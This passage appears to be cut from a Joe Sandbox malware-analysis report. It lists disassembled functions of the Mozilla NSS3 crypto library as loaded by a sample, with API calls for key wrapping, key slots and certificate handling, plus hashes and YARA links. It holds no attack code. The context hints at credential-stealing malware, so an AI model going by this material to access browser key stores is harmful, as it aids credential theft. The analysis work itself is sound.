                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                              • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                              • API String ID: 2013311973-4000297177
                                                                                                                                              • Opcode ID: 91281a54c66ac7e5f7516d04a502fc9df9b306961d7b7014433fb635d8362ee4
                                                                                                                                              • Instruction ID: 32ce58ac8811d77771b78f3c59bc443fd376ad517b0ff0148703fa434250f8c4
                                                                                                                                              • Opcode Fuzzy Hash: 91281a54c66ac7e5f7516d04a502fc9df9b306961d7b7014433fb635d8362ee4
                                                                                                                                              • Instruction Fuzzy Hash: 2251E1B1E042199BEF10DBE5CD48B9E77F9AF0538CF040928E829DBA01E374D419CB99
                                                                                                                                              Function 6C7D6E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C68CA30: EnterCriticalSection.KERNEL32(?,?,?,6C6EF9C9,?,6C6EF4DA,6C6EF9C9,?,?,6C6B369A), ref: 6C68CA7A
                                                                                                                                                • Part of subcall function 6C68CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C68CB26
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?,?,6C69BE66), ref: 6C7D6E81
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C69BE66), ref: 6C7D6E98
                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6C83AAF9,?,?,?,?,?,?,6C69BE66), ref: 6C7D6EC9
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C69BE66), ref: 6C7D6ED2
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C69BE66), ref: 6C7D6EF8
                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F1F
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F28
                                                                                                                                              • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6F3D
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C69BE66), ref: 6C7D6FA6
                                                                                                                                              • sqlite3_snprintf.NSS3(?,00000000,6C83AAF9,00000000,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FDB
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FE4
                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D6FEF
                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D7014
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,6C69BE66), ref: 6C7D701D
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C69BE66), ref: 6C7D7030
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D705B
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C69BE66), ref: 6C7D7079
                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D7097
                                                                                                                                              • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C69BE66), ref: 6C7D70A0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                              • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                              • API String ID: 593473924-707647140
                                                                                                                                              • Opcode ID: e958c3a7ac14dceb5ab8a6e993034df3ecb3b7a41aa458b69864209e36e23f46
                                                                                                                                              • Instruction ID: 81c9faa115301c565f1c2d6d4599c36057096a9c672c41604e91a7e08d580bf9
                                                                                                                                              • Opcode Fuzzy Hash: e958c3a7ac14dceb5ab8a6e993034df3ecb3b7a41aa458b69864209e36e23f46
                                                                                                                                              • Instruction Fuzzy Hash: 2D517BB1A0511227E31096349D59FBF36669F9330CF154A38E80696FC1FB25B50EC2E7
                                                                                                                                              Function 6C738E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_WrapKey), ref: 6C738E76
                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C738EA4
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738EB3
                                                                                                                                                • Part of subcall function 6C81D930: PL_strncpyz.NSS3(?,?,?), ref: 6C81D963
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C738EC9
                                                                                                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C738EE5
                                                                                                                                              • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C738F17
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738F29
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C738F3F
                                                                                                                                              • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C738F71
                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C738F80
                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C738F96
                                                                                                                                              • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C738FB2
                                                                                                                                              • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C738FCD
                                                                                                                                              • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C739047
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                              • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
                                                                                                                                              • API String ID: 1003633598-4293906258
                                                                                                                                              • Opcode ID: c135ada4d5631a23059e35de5f1429dd132b3254ffbd1b2d6a3d185d054d6df1
                                                                                                                                              • Instruction ID: 3a6e966f6fad2ba2b6432c7a4f97ca28f74c3f80166928dd962cd570f2ab768f
                                                                                                                                              • Opcode Fuzzy Hash: c135ada4d5631a23059e35de5f1429dd132b3254ffbd1b2d6a3d185d054d6df1
                                                                                                                                              • Instruction Fuzzy Hash: D651C831506126ABDB218F549F4CFAA37B6AB4230CF046476F50DABA13D738A858C7D1
                                                                                                                                              Function 6C764C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C50
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C5B
                                                                                                                                              • PR_smprintf.NSS3(6C83AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764C76
                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764CAE
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764CC9
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764CF4
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C764D0B
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764D5E
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C754F51,00000000), ref: 6C764D68
                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C764D85
                                                                                                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C764DA2
                                                                                                                                              • free.MOZGLUE(?), ref: 6C764DB9
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C764DCF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                              • API String ID: 3756394533-2552752316
                                                                                                                                              • Opcode ID: 929e4a180db0324d926b0607c965fd00d079cf4b2cff79f8e8df7d11da6997cb
                                                                                                                                              • Instruction ID: b3e020d9dd0c59cb4d87edcef50044eacd49febd3d02028fdb427e00ba5f9319
                                                                                                                                              • Opcode Fuzzy Hash: 929e4a180db0324d926b0607c965fd00d079cf4b2cff79f8e8df7d11da6997cb
                                                                                                                                              • Instruction Fuzzy Hash: BE4189B1D00141ABDB22DF5ADE45ABB3A65AB8630CF484534EC1A0BF02E731D828D7D3
                                                                                                                                              Function 6C746CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C746943
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C746957
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C746972
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C746983
                                                                                                                                                • Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7469AA
                                                                                                                                                • Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7469BE
                                                                                                                                                • Part of subcall function 6C746910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7469D2
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7469DF
                                                                                                                                                • Part of subcall function 6C746910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C746A5B
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C746D8C
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C746DC5
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746DD6
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746DE7
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C746E1F
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746E4B
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746E72
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746EA7
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746EC4
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746ED5
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C746EE3
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746EF4
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746F08
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C746F35
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746F44
                                                                                                                                              • free.MOZGLUE(?), ref: 6C746F5B
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C746F65
                                                                                                                                                • Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C74781D,00000000,6C73BE2C,?,6C746B1D,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C40
                                                                                                                                                • Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C74781D,?,6C73BE2C,?), ref: 6C746C58
                                                                                                                                                • Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C6F
                                                                                                                                                • Part of subcall function 6C746C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C746C84
                                                                                                                                                • Part of subcall function 6C746C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C746C96
                                                                                                                                                • Part of subcall function 6C746C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C746CAA
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746F90
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C746FC5
                                                                                                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6C746FF4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                              • String ID: +`ul
                                                                                                                                              • API String ID: 1304971872-149724355
                                                                                                                                              • Opcode ID: ba7b43eb22fdb655eed3cdf8ebc625b8e5fb97716ffe7b8d499c79f8644ea67a
                                                                                                                                              • Instruction ID: 8e028db3aef966e97892b46853b994a0bef8a64abe75329dc474614a6ffe7d07
                                                                                                                                              • Opcode Fuzzy Hash: ba7b43eb22fdb655eed3cdf8ebc625b8e5fb97716ffe7b8d499c79f8644ea67a
                                                                                                                                              • Instruction Fuzzy Hash: 28B182B4E012199FEF11CBA5DA45B9E7BF9BF09348F148035E815E7A01E735EA04CBA1
                                                                                                                                              Function 6C70DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C70DDDE
                                                                                                                                                • Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
                                                                                                                                                • Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
                                                                                                                                                • Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C70DDF5
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C70DE34
                                                                                                                                              • PR_Now.NSS3 ref: 6C70DE93
                                                                                                                                              • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C70DE9D
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70DEB4
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C70DEC3
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C70DED8
                                                                                                                                              • PR_smprintf.NSS3(%s%s,?,?), ref: 6C70DEF0
                                                                                                                                              • PR_smprintf.NSS3(6C83AAF9,(NULL) (Validity Unknown)), ref: 6C70DF04
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C70DF13
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C70DF22
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C70DF33
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C70DF3C
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C70DF4B
                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C70DF74
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C70DF8E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                              • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                              • API String ID: 1882561532-3437882492
                                                                                                                                              • Opcode ID: b8b56a2b1316ab8f66d227cf5f71d691179cbef7017cb991437071205fcd1224
                                                                                                                                              • Instruction ID: a80f09fec3de06f2e563000c38b4df9a61e9f1f109901bc5beb21d88da263b29
                                                                                                                                              • Opcode Fuzzy Hash: b8b56a2b1316ab8f66d227cf5f71d691179cbef7017cb991437071205fcd1224
                                                                                                                                              • Instruction Fuzzy Hash: 6D5191F1E002059BDB10DE659E45AAE7BE9AF95358F144438EC19E7B00E730E914CBE5
                                                                                                                                              Function 6C742D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C742DEC
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C742E00
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C742E2B
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C742E43
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C,?,-00000001,00000000,?), ref: 6C742E74
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C714F1C,?,-00000001,00000000), ref: 6C742E88
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EC6
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EE4
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C742EF8
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C742F62
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C742F86
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C742F9E
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C742FCA
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C74301A
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C74302E
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C743066
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C743085
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C7430EC
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C74310C
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6C743124
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C74314C
                                                                                                                                                • Part of subcall function 6C729180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C75379E,?,6C729568,00000000,?,6C75379E,?,00000001,?), ref: 6C72918D
                                                                                                                                                • Part of subcall function 6C729180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C75379E,?,6C729568,00000000,?,6C75379E,?,00000001,?), ref: 6C7291A0
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C74316D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3383223490-0
                                                                                                                                              • Opcode ID: f2e4eef44b5bfbc992bf16197c2fb5e1701c9e9118a417ac9e894869d32b1b01
